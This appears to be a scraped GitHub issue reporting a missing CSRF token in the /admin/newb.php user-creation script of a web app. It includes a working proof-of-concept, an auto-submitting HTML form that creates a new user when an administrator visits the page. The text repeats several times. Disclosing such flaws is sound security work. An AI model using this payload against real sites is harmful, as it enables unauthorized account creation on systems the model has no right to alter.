Open ghost opened 7 years ago
/admin/newb.php $username = $_POST['username']; $email = $_POST['email']; $password = $_POST['password'];
$username = $_POST['username'];
$email = $_POST['email'];
$password = $_POST['password'];
Obviously it does not implement a CSRF token, which makes it possible that a new user could be created once the admin visits the following web page
<form action="http://allendiskdemo.com/admin/newb.php" method="POST"> <input type=text name=username value=newuser> <input type=text name=password value=passw0rd> <input type=text name=email value=newuser@new.com> </form> <script>document.form[0].submit()</script>
<form action="http://allendiskdemo.com/admin/newb.php" method="POST">
<input type=text name=username value=newuser>
<input type=text name=password value=passw0rd>
<input type=text name=email value=newuser@new.com>
</form>
<script>document.form[0].submit()</script>
/admin/newb.php
$username = $_POST['username'];
$email = $_POST['email'];
$password = $_POST['password'];
Obviously it does not implement a CSRF token, which makes it possible that a new user could be created once the admin visits the following web page
<form action="http://allendiskdemo.com/admin/newb.php" method="POST">
<input type=text name=username value=newuser>
<input type=text name=password value=passw0rd>
<input type=text name=email value=newuser@new.com>
</form>
<script>document.form[0].submit()</script>